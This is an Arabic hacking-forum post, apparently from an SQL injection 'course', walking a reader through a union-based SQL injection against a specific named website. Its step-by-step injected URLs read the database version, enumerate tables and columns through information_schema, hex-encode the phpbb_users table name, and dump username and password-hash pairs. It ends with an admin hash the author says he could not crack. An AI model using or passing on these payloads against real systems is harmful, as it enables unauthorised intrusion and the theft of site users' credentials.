| اقتباس | | | | | المشاركة الأصلية كتبت بواسطة hacker2020 | | | | | | | | لك من احلاة تقيم بس أريد شرح كامل اوك وشكرا على المجهود الجيد دة
خالد سعودي | | | | | |
ولايهمك ياغالي
ولكن تابع الدورة اوكي
يالله نبدا
بسم الله الرحمن الرحيم
من اصدارالقاعدة
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,version(),3,4,5+from+information_schema.columns--
بعدين نضع الامر هذا في مكان اصدار القاعدةversion()
كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema)
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns--
تمام باقي علينا لباسبودWhere+column_name+LIKE باس مشفرة من فيرفوكس
الظاهر انك تعرف كيف تجيبه
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
تلاحظ ان في الحقنه موجودGroup_ وهي تعرض الجميع لي في الجدوال
وطلع لك جميع لي في الجدوال وتبحث فيهم واحد واحد خينا ناخذ واحد منهو مثل phpbb_users
نشفيرها الموقع هذا وهو من الاساسيات
كود PHP:
http://www.waraxe.us/sql-char-encoder.html
ممكن انك تعرف الموقع كيف يستخدام اذكانت ماتعرف قولي واحسن شي انك التابع الدورة sql في المنتدي وتركز فيها
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+table_name=0x70687062625f7573657273--
طلعتلك الستا تجرب فيهم علما user_id عضو مافي فائدة منه تبحث عن الباسورد او اليوز نيم من هذا قبيل
خلينا ناخذ واحد منهم username+user_password
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(username,0x3a,user_password),3,4,5+from+phpbb_users--
admin:61b19b269cc521c8e15bbadb4dfe49a7
انا حولت فك الباس ولكن ما فك معي
:a14: والله طلع من الاختبارات وكتبت الموضوع وانااسف على التاخير يا غالي
في النهاية تتركك في فمان الرحمن ولكن كم اقولك تابع الدورة في المنتدي وركز عليه
تقييم